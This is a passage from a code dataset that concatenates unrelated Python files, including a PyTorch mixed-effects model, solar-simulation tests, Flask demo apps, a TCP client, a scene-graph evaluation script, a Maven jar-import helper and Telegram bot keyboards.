chunk_grouped_data(Z, X[:, self.ff_idx], y, weights, group_ids=group_ids):\n Zs_by_r[len(Z_g)].append(Z_g)\n ys_by_r[len(Z_g)].append(y_g)\n Xs_by_r[len(Z_g)].append(X_g)\n ws_by_r[len(Z_g)].append(w_g)\n\n # compute log-prob per batch:\n re_dist = self.re_distribution(gf)\n log_probs = []\n for r, y_r in ys_by_r.items():\n ng = len(y_r)\n X_r = torch.stack(Xs_by_r[r])\n Z_r = torch.stack(Zs_by_r[r])\n w_r = torch.stack(ws_by_r[r])\n\n # counter-intuitively, it's faster (for `backward()`) if we call this one per batch here (vs. calling for\n # the entire dataset above)\n loc = self.fixed_effects_nn(X_r)\n if len(loc.shape) > 2:\n loc = loc.squeeze(-1)\n\n # import pdb\n # pdb.set_trace()\n # mvnorm = WoodburyMultivariateNormal(\n # loc=loc,\n # sigma_diag=self.residual_var * 1 / w_r.sqrt(),\n # Z=Z_r,\n # re_precision=re_dist.precision_matrix.expand(ng, -1, -1),\n # validate_args=False\n # )\n cov_r = Z_r @ re_dist.covariance_matrix.expand(ng, -1, -1) @ Z_r.permute(0, 2, 1)\n sigma_diag_r = self.residual_var / w_r\n if torch.isnan(cov_r).any() or torch.isinf(cov_r).any():\n raise ValueError(\"Nans/infs in parameters\")\n mvnorm = _mvnorm_eps(loc, sigma_diag_r, cov_r)\n\n log_probs.append(mvnorm.log_prob(torch.stack(y_r)))\n\n return torch.cat(log_probs).sum()\n\n\ndef _mvnorm_eps(loc, sigma_diag, cov, start_eps: float = .000001) -> MultivariateNormal:\n mvnorm = None\n eps = start_eps\n while mvnorm is None:\n try:\n mvnorm = MultivariateNormal(\n loc=loc, covariance_matrix=torch.diag_embed(sigma_diag + eps) + cov, validate_args=True\n )\n except (ValueError, RuntimeError):\n eps *= 10\n if eps > .01:\n raise\n return mvnorm\n","repo_name":"strongio/torch-hlm","sub_path":"torch_hlm/mixed_effects_module/gaussian.py","file_name":"gaussian.py","file_ext":"py","file_size_in_byte":8782,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"}
+{"seq_id":"41987431422","text":"import numpy as np\nimport pytest\nimport simulation as simulation\n\n\n@pytest.fixture\ndef solar():\n solar_calculations = simulation.environment.SolarCalculations()\n return solar_calculations\n\n\ndef test_apply_cloud_cover1(solar):\n test_cloud_cover = np.array([0, 0, 0])\n test_GHI = np.array([1, 2, 3])\n\n result_GHI = solar.apply_cloud_cover(GHI=test_GHI, cloud_cover=test_cloud_cover)\n\n expected_GHI = np.array([1, 2, 3])\n assert np.all(result_GHI == expected_GHI)\n\n\ndef test_apply_cloud_cover2(solar):\n test_cloud_cover = np.array([100, 100, 100])\n test_GHI = np.array([1, 2, 1])\n\n result_GHI = solar.apply_cloud_cover(GHI=test_GHI, cloud_cover=test_cloud_cover)\n\n expected_GHI = np.array([0.25, 0.5, 0.25])\n assert np.all(result_GHI == expected_GHI)\n","repo_name":"UBC-Solar/Simulation","sub_path":"tests/test_solar.py","file_name":"test_solar.py","file_ext":"py","file_size_in_byte":784,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"61"}
+{"seq_id":"36837318831","text":"import numpy as np\nnp.random.seed(123)\nimport torch\nimport torch.optim as optim\n\nfrom sushigo.learning.pg_ff.players.simple_player import Simple_player\nfrom sushigo.learning.pg_rnn.players.pg_player import Pg_player\nfrom sushigo.learning.pg_rnn.policies.rnn_policy import Policy, finish_game\nfrom sushigo.learning.pg_rnn.util.util import adjust_learning_rate\nfrom sushigo.deck import StandardDeck\nfrom sushigo.game import Game\n\n#Set up policy\npolicy = Policy('LSTM',22,20,1,11)\ntorch.manual_seed(123)\n\n#Parameters\ngamma = 0.99\n\n#Set up optim\nlr = 1e-2\noptimizer = optim.Adam(policy.parameters(), lr=lr)\nlog_interval = 10\n\n\n#Play games\ndeck = StandardDeck()\nN_cards = len(list(set([str(_) for _ in deck])))\np1 = Pg_player(policy=policy,name=\"PG_player01\")\np2 = Simple_player(weights=[1/N_cards]*N_cards,name=\"SIMPLE_player01\")\n\newma = 0.5\nalpha = 0.95\nfor n in range(100):\n game = Game([p1,p2],verbose=False)\n game.simulate_game()\n win = game.did_player_win(p1.name)\n ewma = alpha*ewma + (1-alpha)*int(win)\n print('At %3i ewma win ratio %5.3f'%(n,ewma))\n\n finish_game(policy, gamma=gamma, optimizer=optimizer)\n p1.prev_reward = None\n optimizer = adjust_learning_rate(optimizer,n,lr,30)\n","repo_name":"koaning/sushigo","sub_path":"sushigo/learning/pg_rnn/main_rnn_pg.py","file_name":"main_rnn_pg.py","file_ext":"py","file_size_in_byte":1209,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"}
+{"seq_id":"20722881957","text":"# -*- coding: utf-8 -*-\n\nfrom flask import Flask, render_template, jsonify, request\nfrom flask_assets import Environment\nfrom moody import chatbot\nimport os\n\n\napp = Flask(__name__)\nassets = Environment(app)\n\n\n@app.route(\"/\")\ndef home():\n\n question = request.args.get('question')\n\n if question:\n response = chatbot.get_response(question)\n\n return jsonify(response.text)\n else:\n return render_template('base.html')\n\n\nif __name__ == \"__main__\":\n\n PORT = int(os.environ.get(\"PORT\", 5000))\n DEBUG = os.environ.get(\"DEBUG\", True)\n\n extra_files = ['./templates/base.html', './static/css/styles.css']\n\n app.run(host=\"0.0.0.0\", port=PORT, debug=DEBUG, extra_files=extra_files)\n","repo_name":"agnaite/moody-bot","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":710,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"}
+{"seq_id":"10583911505","text":"from flask import Flask, render_template, request, redirect, session\napp = Flask(__name__)\napp.secret_key = 'counter.coding.dojo'\n\n@app.route('/')\ndef index():\n if 'counter' in session:\n session['counter'] += 1\n else:\n session['counter'] = 1\n return render_template('index.html')\n\n@app.route('/destroy_session', methods = ['POST', 'GET'])\ndef destroy_session():\n session.clear()\n return redirect('/')\nif __name__ == '__main__':\n app.run(debug=True)","repo_name":"ezhu22/python","sub_path":"flask/flask_fundamentals/counter/counter.py","file_name":"counter.py","file_ext":"py","file_size_in_byte":480,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"20707011026","text":"# -*- coding:utf-8 -*-\nimport socket\nimport time\nimport aisprotocol\nimport tcpclientClass\n\nhost = \"10.0.0.23\" #お使いのサーバーのホスト名を入れます\nport = 445 #適当なPORTを指定してあげます\nstartingTime = time.time()\n\ndef getCurrentTime():\n return time.time() - startingTime\n\nclient = tcpclientClass.tcpClient() #オブジェクトの作成をします\n\nclient.setHost(host, port) #これでサーバーに接続します\nclient.connect()\n\nclient.startRecieve()\n\nrobotinfo = []\nrobotinfo.append(aisprotocol.robotInfo())\n\nwhile True:\n time.sleep(1)\n client.send(robotinfo[0].buildData().encode('utf-8')) #適当なデータを送信します(届く側にわかるように)\n status, msg = client.getMsg()\n print(msg)\n print(\"time\" + str(getCurrentTime()))\n if status:\n sender_ip,sender_color,datalist = aisprotocol.decodeData(msg)\n\n onTable,robotIndex = aisprotocol.isOnTable(sender_ip,robotinfo)\n if not onTable:\n robotinfo.append(aisprotocol.robotInfo(sender_ip,sender_color))\n robotIndex = len(robotinfo)-1\n\n if not robotinfo[robotIndex].rawMsg2obj(msg):\n print(\"ERROR in processing data\")\n for e in robotinfo:\n print(e)\n","repo_name":"aisjapan/tcpCommunication","sub_path":"tcpclient.py","file_name":"tcpclient.py","file_ext":"py","file_size_in_byte":1256,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"16724619288","text":"# lightningmodule catalog.\nfrom lightning.vision import ( # noqa\n ClassificationTrainer,\n DistillationTrainer,\n MMDetectionTrainer,\n MMPoseTrainer,\n MultiFramePoseLiftingTrainer,\n PoseLiftingTrainer,\n)\nfrom utils.pretrained import load_model_weights\n\nfrom ._get import _get\n\n\ndef get(name):\n return _get(globals(), name, \"LightningModule\")\n\n\ndef build(name, *args, **kwargs):\n return get(name)(*args, **kwargs)\n\n\ndef build_from_cfg(model_cfg, training_cfg, const_cfg={}):\n lightning_module = get(training_cfg[\"ID\"])\n model = lightning_module(model_cfg, training_cfg, const_cfg)\n\n # load model from path if specified.\n if \"state_dict_path\" in model_cfg:\n load_model_weights(\n model=model,\n state_dict_path=model_cfg[\"state_dict_path\"],\n is_ckpt=model_cfg.get(\"is_ckpt\", False),\n )\n\n return model\n","repo_name":"sieu-n/awesome-modular-pytorch-lightning","sub_path":"catalog/lightning.py","file_name":"lightning.py","file_ext":"py","file_size_in_byte":882,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"61"}
+{"seq_id":"13369968711","text":"#!/usr/bin/python\n\n\"\"\"\nEmployee Scheduler v 0.1\nAuthor: Benjamin Ross benr22@gmail.com\nDate: 2/27\n\nScheduler Class\n\"\"\"\nfrom employee import Employee\nfrom shift import Shift\nimport random\n\nclass Chromosome:\n\n def __init__(self, shift = None):\n \"\"\"\n Constructor\n @param shift: shift being scheduled\n \"\"\"\n \n if shift is None:\n self.shift = None\n else:\n self.shift = shift\n\n self.fitness = 0 \n\nclass Schedule:\n\n def __init__(self, shifts = None, employees = None):\n \"\"\"\n Constructor\n @param shifts: list of shifts to schedule\n @param employees: list of employees\n \"\"\"\n\n if shifts is None:\n self.shifts = None\n else:\n self.shifts = shifts\n\n if employees is None:\n self.employees = None\n else:\n self.employees = employees\n\n self.chromo_list = None\n\n def set_shifts(self, shifts):\n \"\"\"\n Sets the shifts\n \"\"\"\n\n self.shifts = shifts\n\n def get_shifts(self):\n \"\"\"\n Returns the shifts\n \"\"\"\n\n return self.shifts\n\n def set_employees(self, employees):\n \"\"\"\n Sets the employees\n \"\"\"\n \n self.employees = employees\n\n def init_schedule(self):\n \"\"\"\n Initalizes the shifts with random employees\n \"\"\"\n\n self.chromo_list = [Chromosome] * len(self.shifts.size)\n \n while iter is not len(self.chromo_list.size):\n self.chromo_list[iter].shift = self.shifts[iter]\n\n \n","repo_name":"bpross/MyCourses-Scheduler","sub_path":"algorithm/employee_scheduler/schedule.py","file_name":"schedule.py","file_ext":"py","file_size_in_byte":1582,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"}
+{"seq_id":"6092840895","text":"\nimport pyximport\n\nfrom config import COCO_SGS_dir\n\npyximport.install(language_level=3)\nfrom competitors.charts import plot_comparison_both, plot_comparison_coverage, plot_comparison_diversity\n\n\n\nfrom competitors.kmeodids import compute_BOW_descriptors, read_BOW_images, kmedoids_summary, get_kmedoids_graphs, \\\n competitors_dir\n\nfrom sims.prs import edge_pruning, node_pruning, load_PRS\nfrom sims.scene_graphs.image_processing import getImageName\nfrom shutil import copyfile\nimport os\n\nimport pandas as pd\nimport json\n\nfrom sims.graph_algorithms import compute_coverage_matrix\nfrom sims.sgs_evaluation import evaluate_summary_graphs\nfrom sims.sims_config import SImS_config\nfrom sims.visualization import print_graphs\n\nif __name__ == \"__main__\":\n class RUN_CONFIG:\n compute_BOW_descriptors = False # Map each COCO image to its BOW descriptors\n run_kmedoids = False # Run KMedoids summary for different k values\n print_kmedoids_graphs = False # Print scene graphs of selected kmedoids images (for each k)\n\n use_full_graphs = False # True if you want to compute coverage on full graphs\n # False to apply node and edge pruning before computing coverage\n pairing_method = 'img_min' # Method used to associate images to SGS graphs (see associate_img_to_sgs() in sgs.pyx)\n # img_min, img_max, img_avg, std\n\n compute_kmedoids_coverage_matrix = False # Compute graph coverage matrix for kmedoids\n evaluate_kmedoids = False # Use coverage matrix to compute graph coverage and diversity of kmedoids\n write_comparison_charts = True # Write comparison charts between kmedoids and SImS (for white paper)\n\n #dataset = 'COCO_subset' # Choose dataset\n dataset = 'COCO_subset2'\n #dataset = 'COCO_subset3'\n\n if dataset == 'COCO_subset':\n mink = 4 # Min value of k to test kmedoids\n maxk = 20 # Max value of k to test kmedoids\n elif dataset in ('COCO_subset2', 'COCO_subset3'):\n mink = 2\n maxk = 20\n\n # Paths:\n dsname_prefix = []\n output_path = os.path.join(competitors_dir, RUN_CONFIG.dataset)\n if not os.path.exists(output_path):\n os.makedirs(output_path)\n kmedoids_out_clusters_path = os.path.join(output_path, \"centroids.json\")\n config = SImS_config(RUN_CONFIG.dataset)\n # --------------------------\n\n # Feature extraction for each image in COCO training set\n if RUN_CONFIG.compute_BOW_descriptors:\n compute_BOW_descriptors()\n # KMedoids summary for different k values\n if RUN_CONFIG.run_kmedoids:\n X = read_BOW_images(RUN_CONFIG.dataset)\n res = {}\n avg_time = 0\n print(f\"Number of images: {len(X)}\")\n for k in range(RUN_CONFIG.mink, RUN_CONFIG.maxk+1):\n medoids, duration = kmedoids_summary(X, k)\n res[k] = (medoids, duration.seconds)\n avg_time += duration.seconds\n print(f\"{k}: {medoids}\")\n with open(os.path.join(output_path, \"log.txt\"),'a+') as f:\n f.write(f\"{k}: {medoids}\\n\")\n print(str(avg_time/len(res)))\n with open(os.path.join(output_path, \"avgTime.txt\"), 'w') as f:\n f.write('Average time for kmedoids run on COCO subset (seconds):\\n')\n f.write(str(avg_time/len(res)))\n with open(kmedoids_out_clusters_path,'w') as f:\n json.dump(res, f)\n # Print graphs associated to kmedoids\n if RUN_CONFIG.print_kmedoids_graphs:\n with open(kmedoids_out_clusters_path) as f:\n kmedoids_result = json.load(f)\n with open(config.scene_graphs_json_path, 'r') as f:\n coco_graphs = json.load(f)\n kmedoids_graphs = get_kmedoids_graphs(kmedoids_result, coco_graphs)\n\n for k, graphs in kmedoids_graphs.items():\n out_graphs_dir = os.path.join(output_path,'kmedoids_graphs',f'k{k}')\n if not os.path.exists(out_graphs_dir):\n os.makedirs(out_graphs_dir)\n print_graphs(graphs, out_graphs_dir)\n for i, g in enumerate(graphs):\n imgName = getImageName(g['graph']['name'], extension='jpg')\n copyfile(os.path.join(config.img_dir, imgName), os.path.join(out_graphs_dir, f\"g{i}.jpg\"))\n\n # Compute graph coverage for kmedoids (coverage matrix)\n if RUN_CONFIG.compute_kmedoids_coverage_matrix:\n with open(kmedoids_out_clusters_path) as f:\n kmedoids_result = json.load(f)\n with open(config.scene_graphs_json_path, 'r') as f:\n coco_graphs = json.load(f)\n kmedoids_graphs = get_kmedoids_graphs(kmedoids_result, coco_graphs)\n\n # Load pairwise relationship summary (PRS) if needed\n if RUN_CONFIG.use_full_graphs==False:\n prs = load_PRS(config, True)\n # Apply node and edge pruning before computing coverage matrix\n cmatrices_list = []\n omatrices_list = []\n for k, summary_graphs_i in kmedoids_graphs.items():\n if RUN_CONFIG.use_full_graphs == False:\n summary_graphs_i = edge_pruning(prs, summary_graphs_i)\n summary_graphs_i = node_pruning(summary_graphs_i)\n\n cmatrix, omatrix = compute_coverage_matrix(coco_graphs, [{'g':s} for s in summary_graphs_i])\n cmatrix.columns = list(range(int(k)))\n omatrix.columns = list(range(int(k)))\n cmatrix['k'] = k\n omatrix['k'] = k\n cmatrices_list.append(cmatrix)\n omatrices_list.append(omatrix)\n cmatrices = pd.concat(cmatrices_list, sort=True)\n omatrices = pd.concat(omatrices_list, sort=True)\n cmatrices.set_index('k', inplace=True)\n omatrices.set_index('k', inplace=True)\n cmatrices.index.name = 'k'\n omatrices.index.name = 'k'\n if RUN_CONFIG.use_full_graphs:\n output_file_c = os.path.join(output_path, \"coverage_mat_full.csv\")\n output_file_o = os.path.join(output_path, \"overlap_mat_full.csv\")\n else:\n output_file_c = os.path.join(output_path, \"coverage_mat_pruned.csv\")\n output_file_o = os.path.join(output_path, \"overlap_mat_pruned.csv\")\n cmatrices.to_csv(output_file_c, sep=\",\")\n omatrices.to_csv(output_file_o, sep=\",\")\n\n # Compute coverage and diversity for kmedoids\n if RUN_CONFIG.evaluate_kmedoids:\n with open(kmedoids_out_clusters_path) as f:\n kmedoids_result = json.load(f)\n with open(config.scene_graphs_json_path, 'r') as f:\n coco_graphs = json.load(f)\n kmedoids_graphs = get_kmedoids_graphs(kmedoids_result, coco_graphs)\n\n if RUN_CONFIG.use_full_graphs==False:\n suffix = \"_pruned\"\n suffix2=f\"_{RUN_CONFIG.pairing_method}\"\n else:\n suffix = \"_full\"\n suffix2 = \"\"\n cmatrices = pd.read_csv(os.path.join(output_path, f\"coverage_mat{suffix}.csv\"), index_col='k')\n omatrices = pd.read_csv(os.path.join(output_path, f\"overlap_mat{suffix}.csv\"), index_col='k')\n\n # Load pairwise relationship summary (PRS) if needed\n if RUN_CONFIG.use_full_graphs==False:\n prs = load_PRS(config, True)\n # Prune kmedoids graphs before computing coverage and diversity\n results = []\n for k, summary_graphs_i in kmedoids_graphs.items():\n if RUN_CONFIG.use_full_graphs == False:\n summary_graphs_i = edge_pruning(prs, summary_graphs_i)\n summary_graphs_i = node_pruning(summary_graphs_i)\n\n res = evaluate_summary_graphs([{'g':s} for s in summary_graphs_i], cmatrices.loc[int(k)].iloc[:,:int(k)], omatrices.loc[int(k)].iloc[:,:int(k)])\n results.append(res)\n\n kmed_df = pd.DataFrame(results, columns=[\"N. graphs\",\n \"Avg. nodes\", \"Std. nodes\",\n \"Coverage\",\n \"Coverage-overlap\",\n \"Diversity\",\n \"Diversity-ne\"])\n kmed_df.to_csv(os.path.join(output_path, f\"evaluation{suffix}.csv\"))\n\n # Write comparison charts for white paper\n if RUN_CONFIG.write_comparison_charts:\n if RUN_CONFIG.use_full_graphs==False:\n suffix = \"_pruned\"\n suffix2=f\"_{RUN_CONFIG.pairing_method}\"\n else:\n suffix = \"_full\"\n suffix2 = \"\"\n\n # Read SImS results\n sims_eval_path = os.path.join(config.SGS_dir, f'evaluation{suffix2}.csv')\n if not os.path.exists(sims_eval_path):\n print(\"You have to evaluate SImS first. Run main_SGS.py with evaluate_SGS_experiments=True\")\n exit()\n else:\n sims_df = pd.read_csv(sims_eval_path, index_col=0)\n\n # Aggregate experiments\n if 'subset2' in config.SGS_dir:\n sims_eval_path = os.path.join(COCO_SGS_dir + \"/subset2_agg/\", f'evaluation{suffix2}.csv')\n elif 'subset3' in config.SGS_dir:\n sims_eval_path = os.path.join(COCO_SGS_dir + \"/subset3_agg/\", f'evaluation{suffix2}.csv')\n\n if not os.path.exists(sims_eval_path):\n print(\"You have to evaluate SImS (agg) first. Run main_SGS.py with evaluate_SGS_experiments=True for aggregated datasets\")\n exit()\n else:\n sims_agg_df = pd.read_csv(sims_eval_path, index_col=0)\n\n # Read kmedoids results\n kmed_eval_path = os.path.join(output_path, f\"evaluation{suffix}.csv\")\n if not os.path.exists(kmed_eval_path):\n print(\"You have to evaluate Kmedoids first. Run main_competitors.py with evaluate_kmedoids=True\")\n exit()\n else:\n kmed_df = pd.read_csv(kmed_eval_path, index_col=0)\n\n plot_comparison_both(RUN_CONFIG.mink, RUN_CONFIG.maxk, sims_df, sims_agg_df, kmed_df, suffix2, output_path)\n plot_comparison_coverage(RUN_CONFIG.mink, RUN_CONFIG.maxk, sims_df, sims_agg_df, kmed_df, suffix2, output_path)\n plot_comparison_diversity(RUN_CONFIG.mink, RUN_CONFIG.maxk, sims_df, sims_agg_df, kmed_df, suffix2, output_path)\n # fig, ax = plt.subplots(1,2, figsize=[9,3])\n # ax[0].plot(np.arange(RUN_CONFIG.mink, RUN_CONFIG.maxk + 1), sims_df.loc[sims_df['N. graphs'] >= RUN_CONFIG.mink]['Coverage'], label='SImS',\n # marker='o', markersize='4', color='#33a02c', markerfacecolor='#b2df8a')\n # ax[0].plot(np.arange(RUN_CONFIG.mink,RUN_CONFIG.maxk + 1), kmed_df['Coverage'], label='KMedoids',\n # marker='o', markersize='4', color='#1f78b4', markerfacecolor='#a6cee3')\n # ax[0].set_xlabel('# graphs (k)')\n # ax[0].xaxis.set_major_locator(MaxNLocator(integer=True))\n # ax[0].set_ylabel('coverage')\n # ax[0].grid(axis='y')\n # ax[1].plot(np.arange(RUN_CONFIG.mink, RUN_CONFIG.maxk + 1), sims_df.loc[sims_df['N. graphs'] >= RUN_CONFIG.mink]['Diversity'], label='SImS',\n # marker='o', markersize='4', color='#33a02c', markerfacecolor='#b2df8a')\n # ax[1].plot(np.arange(RUN_CONFIG.mink,RUN_CONFIG.maxk + 1), kmed_df['Diversity'], label='KMedoids',\n # marker='o', markersize='4', color='#1f78b4', markerfacecolor='#a6cee3')\n #\n # ax[1].set_xlabel('# graphs (k)')\n # ax[1].xaxis.set_major_locator(MaxNLocator(integer=True))\n # ax[1].set_ylabel('diversity')\n # ax[1].grid(axis='y')\n # ax[1].legend(bbox_to_anchor=(1.6, 0.4), loc=\"lower right\")\n # plt.tight_layout()\n # plt.savefig(os.path.join(output_path, f'evaluation{suffix2}.eps'), bbox_inches='tight')\n\n\n\n # fig, ax = plt.subplots(1,2, figsize=[8,3], sharey=True)\n # ax[0].plot(np.arange(RUN_CONFIG.mink,RUN_CONFIG.maxk + 1), kmed_df['Coverage'], label='KMedoids',\n # marker='o', markersize='4', color='#1f78b4', markerfacecolor='#a6cee3')\n # ax[1].plot(np.arange(RUN_CONFIG.mink, RUN_CONFIG.maxk + 1), sims_df.loc[sims_df['N. graphs'] >= RUN_CONFIG.mink]['Coverage'], label='Coverage',\n # marker='o', markersize='4', color='#1f78b4', markerfacecolor='#a6cee3')\n # ax[0].set_xlabel('# graphs (k)')\n # ax[0].xaxis.set_major_locator(MaxNLocator(integer=True))\n # #ax[0].set_ylabel('coverage')\n # ax[0].grid(axis='y')\n # ax[0].set_title('KMedoids')\n # ax[0].plot(np.arange(RUN_CONFIG.mink,RUN_CONFIG.maxk + 1), kmed_df['Diversity'], label='KMedoids',\n # marker='o', markersize='4', color='#33a02c', markerfacecolor='#b2df8a')\n # ax[1].plot(np.arange(RUN_CONFIG.mink, RUN_CONFIG.maxk + 1), sims_df.loc[sims_df['N. graphs'] >= RUN_CONFIG.mink]['Diversity'], label='Diversity',\n # marker='o', markersize='4', color='#33a02c', markerfacecolor='#b2df8a')\n # ax[1].set_xlabel('# graphs (k)')\n # ax[1].xaxis.set_major_locator(MaxNLocator(integer=True))\n # #ax[1].set_ylabel('diversity')\n # ax[1].grid(axis='y')\n # ax[1].legend(bbox_to_anchor=(1.6, 0.4), loc=\"lower right\")\n # ax[1].set_title('SImS')\n # plt.tight_layout()\n # plt.savefig(os.path.join(output_path, f'evaluation2{suffix2}.eps'), bbox_inches='tight')\n","repo_name":"AndreaPasini/panoptic-segmentation","sub_path":"main_competitors.py","file_name":"main_competitors.py","file_ext":"py","file_size_in_byte":13381,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"23551624151","text":"#!/usr/bin/python\n#-*- coding: utf8 -*-\n\n''' Template for Google Code Jam '''\n\nimport sys\n\ndef main():\n ''' main '''\n case_num = int(sys.stdin.readline())\n for i in range(1, case_num+1):\n line = sys.stdin.readline().rstrip()\n args = line.split(' ')\n #answer = solve_small(int(args[0]))\n answer = solve_large(int(args[0]))\n print('Case #{0:d}: {1}'.format(i, answer))\n #print('Case #{0:d}: {1}'.format(i, args[0] + ' ' + str(answer)))\n\ndef solve_small(num):\n ''' solve problem '''\n if num < len(memo):\n for i in range(num, 0, -1):\n if isTidy(i):\n return i\n else:\n return False\n\ndef isTidy(num):\n key_num = 9\n while num != 0:\n mod_num = num % 10\n num = int(num / 10)\n if key_num < mod_num:\n return False\n else:\n key_num = mod_num\n return True\n\ndef solve_large(num):\n #321876 -> 321799 -> 299999\n numbers = [int(i) for i in list(str(num))]\n\n tmp_key = 0\n for i in range(0, len(numbers)):\n # if tidy\n if numbers[i] >= tmp_key:\n tmp_key = numbers[i]\n # if not tidy, make tidy\n else:\n for j in range(i, 0, -1):\n numbers[j] = 9\n numbers[j-1] -= 1\n if j-1 == 0 or numbers[j-1] >= numbers[j-2]:\n break\n for j in range(i+1, len(numbers)):\n numbers[j] = 9\n break\n\n return int(''.join(map(str, numbers)))\n\n# tidy memo\nmemosize = 10000\nmemo = [False] * (memosize + 1)\nfor i in range (0, len(memo)):\n if isTidy(i):\n memo[i] = True\n\nif __name__ == '__main__':\n #print(solve_large(110))\n main()\n # print(isTidy(1000))\n # print(isTidy(999))\n # print(isTidy(989))\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_200/1106.py","file_name":"1106.py","file_ext":"py","file_size_in_byte":1796,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"3412543657","text":"import sys, os, subprocess\n\nif len(sys.argv)!=2:\n\tprint(\"Wrong parameters.\")\nelse:\n\trootdir = sys.argv[1]\n\tfor subdir, dirs, files in os.walk(rootdir):\n\t\tfor file in files:\n\t\t\tprint(\"Importing \" + file)\n\t\t\tprint(\"mvn install:install-file -Dfile=\" + os.path.join(subdir, file) + \" -DgroupId=\" + file.rstrip(\".jar\") + \" -DartifactId=\" + file.rstrip(\".jar\") + \" -Dversion=1.0\" + \" -Dpackaging=jar\" + \" -DgeneratePom=true\")\n\t\t\tsubprocess.run([\"mvn\", \"install:install-file\", \"-Dfile=\" + os.path.join(subdir, file), \"-DgroupId=\" + file.rstrip(\".jar\"), \"-DartifactId=\" + file.rstrip(\".jar\"), \"-Dversion=1.0\", \"-Dpackaging=jar\", \"-DgeneratePom=true\"], shell=True)\t\t\t\n\t\t\twith open('dependencies.txt', 'a') as output:\n\t\t\t\toutput.write(\"\\n\")\n\t\t\t\toutput.write(\"\\t\" + file.rstrip(\".jar\") + \"\\n\")\n\t\t\t\toutput.write(\"\\t\" + file.rstrip(\".jar\") + \"\\n\")\n\t\t\t\toutput.write(\"\\t1.0\\n\")\n\t\t\t\toutput.write(\"\\n\\n\")\n\t \n\tprint(\"Process terminated successfully.\")\n","repo_name":"diegodepablos/local2mvn","sub_path":"local2mvn.py","file_name":"local2mvn.py","file_ext":"py","file_size_in_byte":1023,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"8109533830","text":"import multiprocessing\nfrom ursina import *\nimport mediapipe\nimport cv2\nimport pyautogui\n\nspd = 0.1\n\napp = Ursina()\n\nplayer = Entity(model='cube', scale=2, color=color.red)\n\ncap = cv2.VideoCapture(0)\n\nmpHands = mediapipe.solutions.hands\nhands = mpHands.Hands()\nmpDraw = mediapipe.solutions.drawing_utils # For drawing landmarks\n\nid8_positions = []\nid4_positions = []\nid12_positions = []\nposition_list = []\n\ndef update():\n player.x += held_keys['d'] * 0.1\n player.x -= held_keys['a'] * 0.1\n player.y += held_keys['e'] * 0.1\n player.y -= held_keys['q'] * 0.1\n player.z += held_keys['w'] * 0.1\n player.z -= held_keys['s'] * 0.1\n\n player.rotation_x += held_keys['r'] * 5\n player.rotation_y += held_keys['f'] * 5\n player.rotation_z += held_keys['t'] * 5\n\n\ndef run_game():\n while True:\n print('running')\n\n\ndef run_cv():\n while True:\n print('running')\n\n\nif __name__ == '__main__':\n\n p2 = multiprocessing.Process(target=run_cv)\n p2.start()\n p2.join()\n\n print('done')\n app.run()\n\n cap.release()\n cv2.destroyAllWindows()\n","repo_name":"timnirmal/Ursina","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1080,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"5207408567","text":"from aiogram.types import InlineKeyboardMarkup, InlineKeyboardButton as ikb\n\n\ndef category_edit(category_id, remover):\n keyboard = InlineKeyboardMarkup(\n ).add(\n ikb(\"🏷 Изм. название\", callback_data=f\"category_edit_name:{category_id}:{remover}\")\n ).add(\n ikb(\"⬅ Вернуться ↩\", callback_data=f\"catategory_edit_swipe:{remover}\"),\n ikb(\"❌ Удалить\", callback_data=f\"category_edit_delete:{category_id}:{remover}\")\n)\n return keyboard\n\ndef category_edit_cancel(category_id, remover):\n keyboard = InlineKeyboardMarkup(\n ).add(\n ikb(\"❌ Отменить\", callback_data=f\"category_edit_open:{category_id}:{remover}\"),\n )\n return keyboard\n\n# Кнопки с удалением категории\ndef category_edit_delete_selected(category_id, remover):\n keyboard = InlineKeyboardMarkup(\n ).add(\n ikb(\"❌ Да, удалить\", callback_data=f\"category_delete:{category_id}:yes:{remover}\"),\n ikb(\"✅ Нет, отменить\", callback_data=f\"category_delete:{category_id}:not:{remover}\")\n )\n return keyboard\n\n\ndef category_remove_confirm():\n keyboard = InlineKeyboardMarkup(\n ).add(\n ikb(\"❌ Да, удалить все\", callback_data=\"confirm_remove_category:yes\"),\n ikb(\"✅ Нет, отменить\", callback_data=\"confirm_remove_category:not\")\n )\n return keyboard\n\ndef item_remove_confirm():\n keyboard = InlineKeyboardMarkup(\n ).add(\n ikb(\"❌ Да, удалить все\", callback_data=\"confirm_remove_item:yes\"),\n ikb(\"✅ Нет, отменить\", callback_data=\"confirm_remove_item:not\")\n )\n return keyboard\n# Кнопки при открытии позиции для изменения\ndef item_edit_open(item_id, category_id, remover):\n keyboard = InlineKeyboardMarkup(\n ).add(\n ikb(\"🏷 Изменить название\", callback_data=f\"item_edit_name:{item_id}:{category_id}:{remover}\"),\n ikb(\"💰 Изменить цену\", callback_data=f\"item_edit_price:{item_id}:{category_id}:{remover}\"),\n ).add(\n ikb(\"📜 Изменить описание\", callback_data=f\"item_edit_description:{item_id}:{category_id}:{remover}\"),\n ikb(\"📸 Изменить фото\", callback_data=f\"item_edit_photo:{item_id}:{category_id}:{remover}\"),\n ).add(\n ikb(\"❌ Удалить\", callback_data=f\"item_edit_delete:{item_id}:{category_id}:{remover}\"),\n ikb(\"⬅ Вернуться ↩\", callback_data=f\"item_edit_swipe:{item_id}:{remover}\"),\n )\n return keyboard\n\n\ndef 